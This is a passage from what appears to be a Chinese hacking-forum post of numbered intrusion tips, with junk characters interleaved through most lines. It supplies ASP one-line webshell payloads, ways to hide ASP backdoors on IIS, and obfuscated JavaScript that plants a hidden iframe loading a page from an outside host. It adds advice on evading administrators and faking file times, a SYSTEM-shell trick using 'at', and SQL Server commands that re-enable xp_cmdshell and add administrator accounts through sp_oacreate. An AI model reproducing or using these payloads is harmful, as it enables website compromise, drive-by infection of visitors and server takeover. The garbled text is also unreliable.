a).<%%25Execute(request("go"))%%25>
1 f7 n, X( ^6 ^; ~- ib).<%Execute(request("go"))%>! S4 O1 U4 f" x8 m: d7 b
c).%><%execute request("go")%><%6 }) D0 z' U3 K& W% v
d).<script language=VBScript runat=server>execute request("sb")</Script>
& q0 p+ ?% O+ [, V4 Pe).<%25Execute(request("l"))%25>
7 j" L2 }; `4 T: w& F- Q: Sf).<%if request("cmd")<>"" then execute request("pass")%>) i- _0 P' }# n3 f
* y* ?( j" S4 V5 e) U# K; [8 k
52、at "12:17" /interactive cmd
! y: A) h. \! M执行后可以用AT命令查看新加的任务
4 \5 v$ ~9 j+ P, I2 G5 O用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
5 [7 O8 Y3 l) g$ J5 b8 m- t. O: P
53、隐藏ASP后门的两种方法  m% r) W+ j! M2 w
1、建立非标准目录:mkdir images..\
' l; x) k8 [  d4 P3 a' Y( b+ g拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp2 r7 ~0 ?/ d8 O& x4 U% Q; C4 r
通过web访问ASP木马:http://ip/images../news.asp?action=login
1 B) d4 ^9 T( ?4 B如何删除非标准目录:rmdir images..\ /s4 c& ]0 F0 x6 s* q0 U
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:  I" R% Z8 X8 g" q* Q; A' D
mkdir programme.asp
$ @2 ?- t% u) A2 c新建1.txt文件内容:<!--#include file=”12.jpg”-->5 g6 J  S$ n/ I* ?
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
, d, W2 c5 |; |" E% M; ?9 ~7 [attrib +H +S programme.asp
) H6 k3 X; A7 h( {* T6 R. z' t通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt5 r: {2 k8 s1 ]8 h

. F- D; f1 c0 g54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。3 |. A4 F. L: A! `' V* h  _
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
. M5 B2 s( d6 i4 }; R4 H2 L0 @% G! k: `
55、JS隐蔽挂马
" n, I0 Y) ]2 W# `, l9 m1./ n& q! t9 E) q' f6 Y+ D
var tr4c3="<iframe src=ht";; d2 P+ x" |; m
tr4c3 = tr4c3+"tp:/";1 @" b& ^. ]) w4 A% G3 A* g
tr4c3 = tr4c3+"/ww";- ]) q5 E3 _9 p; m3 n
tr4c3 = tr4c3+"w.tr4";
! I5 b" Y8 D* I( M. L- @! ktr4c3 = tr4c3+"c3.com/inc/m";
; Q; L4 q4 {% |+ v% htr4c3 = tr4c3+"m.htm style="display:none"></i";
2 y" n( f& p* x; t6 U. C9 A4 Ktr4c3 =tr4c3+"frame>'";
! d! Z% j" a7 t& A1 A  Q* D/ cdocument.write(tr4c3);, y1 ]2 j+ B: w% s3 Z6 g. s
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 }2 j% s# q" l. n7 T$ C4 l4 B
8 X; D0 |% l* ]- {, r2.
1 N3 F) `, [' d5 b: B% ]3 }; a转换进制,然后用EVAL执行。如
, [8 J" [' \4 Q1 t1 ieval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
8 t  C- L7 f& j6 A! F) z2 ~不过这个有点显眼。, Z* G6 P+ ^& A" ]/ a/ z
3.
. A. m8 K% E0 W# |' E8 L9 Ldocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');- f) S# s; M1 V: _! m# I
最后一点,别忘了把文件的时间也修改下。( E4 a8 G: S9 A9 l# h: L1 y; p
0 {: i% U4 H# M3 l" Q6 `( _
56.3389终端入侵常用DOS命令
/ a2 Y+ ?6 |' I: Btaskkill taskkill /PID 1248 /t4 c) j. b6 \) V2 Q  r. E

0 d7 T; {; z' E+ ytasklist 查进程' x: t8 {8 K; f! J' H
3 v7 s. A& k; ~& P# H# N( ?. m
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" o4 C7 r1 f; r6 A
iisreset /reboot( l2 K( W7 j! L3 g
tsshutdn /reboot /delay:1    重起服务器
6 u; e5 A* ]! x9 d/ d% ~
$ A2 u: d: k1 G# Z& xlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,! Z: c3 C) c+ o& ]* `4 ?
* y% w$ S+ P# ^6 i1 {1 ?
query user 查看当前终端用户在线情况
8 J- n9 q' r. }; Z7 k. N2 y9 w( a4 Z. s& q
要显示有关所有会话使用的进程的信息,请键入:query process *( d' a6 I5 ?% S+ r

: A5 C5 J$ z* m+ j% J要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, {* ?8 T1 }1 m3 I8 F
# r  i+ J! L; O9 V/ n0 N) u% f要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
* l( d. D- K: }4 z$ a0 ^
) W1 N9 V1 d0 c3 I要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 @" ]: P0 i) {+ x6 s
: w5 \' A4 h* u命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
: d2 s+ [; ~4 S7 {! M
$ ~3 z  C' P+ Z命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
7 K8 ~1 F% ^6 o- P4 \7 P" N, j- X$ O$ A) v) ]* B
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。0 L6 F, j% A$ s3 ]5 H( n
( G% l6 U, [/ a# f* }# ?2 Y
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
! S# b3 z% G2 ~  `: W1 K4 _' b! ?7 |- K
56、在地址栏或按Ctrl+O,输入:
9 ~4 M* |% b" _$ l* S) mjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
7 k+ L! |  e( c% \4 M4 V+ Z% i) t
' T4 y, |/ R' C1 c; `. H6 Q. d& F) J7 e源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。7 I5 ~6 J2 a/ q; P/ W

4 Y  p/ z& A' m57、net user的时候,是不能显示加$的用户,但是如果不处理的话,! R2 R4 M  ~' z, ^. {
用net localgroup administrators是可以看到管理组下,加了$的用户的。
4 L7 e5 M* _2 z" T% r7 K: U& R4 @% h, X# x8 [) @' r7 R
58、 sa弱口令相关命令
9 u8 P! {/ Z+ t' J( n$ O1 w/ V& ?+ U
一.更改sa口令方法:" s4 M+ |: O& T$ }8 a/ G* L4 n
用sql综合利用工具连接后,执行命令:) j- C8 r2 p3 o& t
exec sp_password NULL,'20001001','sa'
! T' l% b3 ^, Y2 M(提示:慎用!)
5 h( A) J+ M! }1 k" B3 j% M4 J9 H, {# u& W( Y2 R! @
二.简单修补sa弱口令.$ N( y$ {4 g2 {( z. L1 O

  n/ f# j0 N: [: w  G方法1:查询分离器连接后执行:
! S+ Z9 s  Q9 o( [% `if exists (select * from
5 [* G: k5 [: S% C4 X0 O1 Qdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
% ^( W7 d: q" r4 o0 s% G9 o' UOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
" T7 G- ]" F8 y$ n9 l
+ K8 F, V* P% [  @exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
  ~& G) N% b" A. N$ w8 G' {  R3 H' i9 C" \& g; d" ~- p
GO
: H8 {0 o0 t  z, |  G  H7 l2 ]( |4 w# S
然后按F5键命令执行完毕+ y7 a3 l, g+ n: f) R7 `
, x; k9 k( R7 N$ T
方法2:查询分离器连接后
: v! {# S9 p% a" `2 N8 U第一步执行:use master
# D& k5 b. y6 E0 r! F3 M第二步执行:sp_dropextendedproc 'xp_cmdshell'  K; }" `" V. u8 E3 ?: U, A, V! }8 r
然后按F5键命令执行完毕
9 o  z, Y- o7 A/ O' b+ h# Q% B/ E/ N1 d. l3 ^: E

$ Z% _% m4 _! W: N三.常见情况恢复执行xp_cmdshell.
0 t4 c9 H* G3 }/ }: J' {4 S) P, Z* |9 ?8 a2 j" G8 N
6 n! V, @# o8 a6 z' ^- s
1 未能找到存储过程'master..xpcmdshell'.% k3 _; @, ]& T' M1 U8 x
   恢复方法:查询分离器连接后,. w9 E: ], l5 T) E& ^/ c: U7 `
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int! T- c) _  F! t
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 P& n( ?7 @& e! d/ m然后按F5键命令执行完毕8 u  t9 P* e- u  H' g

: Y8 w* m! v1 L8 V2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
  k( `9 c' o. ], K恢复方法:查询分离器连接后,
% o0 S1 v* O; z2 K8 z第一步执行:sp_dropextendedproc "xp_cmdshell"
6 e# {2 S. K. L8 q" ]% o* e第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& z7 O4 n# T6 ]0 V  ]9 b然后按F5键命令执行完毕
- N' x3 F0 Q  h# B- k* b0 F- L$ l: ~* z
: X7 G$ H" ~0 n1 U3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
( [$ C9 X1 I9 U# r+ S. E& X恢复方法:查询分离器连接后,# S1 {1 R8 p/ e+ t, i# v4 f+ H
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
. c' @  @' \5 g7 H6 x第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ! p. U8 b8 U2 u0 O/ {1 A
然后按F5键命令执行完毕
  y' T$ P  r- t) o$ J7 V6 _3 k; [0 x/ N
四.终极方法." {! t3 `3 g8 K4 h- Q& a
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:8 ]& o, H( y% h9 A, ], z2 T
查询分离器连接后,
% ^$ J0 p5 X; \5 X; a( l! `; o2000servser系统:9 `! p; w- k# J- k- q& W0 B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'+ c/ W: _0 w# h3 G4 X, T
0 |6 R2 C! |9 B9 B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. i$ T5 V: r2 v5 x, T" V
5 c& U5 \/ \0 W0 i( `9 X! P7 Dxp或2003server系统:% S: _8 r  _% C% a* B( [

; o( R. C9 ?, O3 {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
% L; z$ a3 L' c, Z* @8 u! m
# [) ~8 n2 k1 r5 X7 U5 B! d2 [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'2 W% w, h, q# _0 X, O: Y$ s5 G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表